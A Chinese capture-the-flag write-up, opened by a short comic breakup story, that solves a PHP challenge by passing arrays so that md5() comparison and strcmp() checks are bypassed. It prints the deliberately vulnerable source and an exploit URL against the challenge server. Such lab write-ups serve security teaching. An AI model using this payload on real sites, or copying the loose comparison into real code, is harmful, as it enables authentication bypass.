分手了,纠结再三我没有拉黑她,原因无它,放不下。
终于那天,竟然真的等来了她的消息:“在吗?”
我神色平静,但颤抖的双手却显示出我此刻的激动。“怎么了?有事要我帮忙?”
“怎么,没事就不能联系了吗?”结尾处调皮表情,是多么的陌生和熟悉……
“帮我看看这个...”说着,她发来一个链接。
不忍心拂她的意就点开了链接,看着屏幕我的心久久不能平静,往事一幕幕涌上心头......
。。。。。。
“我到底做错了什么,要给我看这个!”
“还记得你曾经说过。。。。。。。。”
PHP是世界上最好的语言
进入后发现是这个..... 出题人辛苦了 我们查看网站源代码发现连接这个词就是个链接 于是我们点击链接一词 可以看到网站源代码
<?php
if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){
$v1 = $_GET['v1'];
$v2 = $_GET['v2'];
$v3 = $_GET['v3'];
if($v1 != $v2 && md5($v1) == md5($v2)){
if(!strcmp($v3, $flag)){
echo $flag;
}
}
}
?> 简单的看下就明白是php中md5()函数漏洞和strcmp()函数漏洞的利用
所以简单构造下数组就可以了
http://47.93.190.246:49162/?v1[]=1&v2[]=2&v3[]=1
直接便得到falg
2554
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
